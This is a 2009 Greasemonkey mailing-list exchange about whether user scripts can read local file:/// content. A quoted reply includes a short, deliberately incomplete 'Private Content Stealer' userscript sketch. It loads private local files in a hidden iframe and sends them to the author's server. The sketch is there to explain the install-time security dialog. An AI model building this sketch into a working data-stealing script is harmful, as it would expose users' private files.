Yes, people can steal info using a GmScript that you can install. I was
talking about in your own GmScript, where you have the control.
Anthony Lieuallen wrote:
> On 8/5/2009 2:55 AM, BD wrote:
>
>> The only person who can view file:/// content is you...
>>
>
> Imagine I am a malicious script author.
>
> // ==UserScript==
> // @name Private Content Stealer
> // @include *
> // ==/UserScript==
>
> if ('file:'==document.location.protocol) {
> // Transmit private data to my server!
> GM_xmlhttpRequest(...);
> } else {
> // Make an iframe to a private file, which I will run on.
> createHiddenIframe('file:///a/file/with/private/contents/here.txt');
> }
>
> Private files stolen. This is why there is a security dialog, which
> presents the @include rules to you, before you install.
>
> >
>
>
--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups
"greasemonkey-users" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/greasemonkey-users?hl=en
-~----------~----~----~----~------~----~------~--~---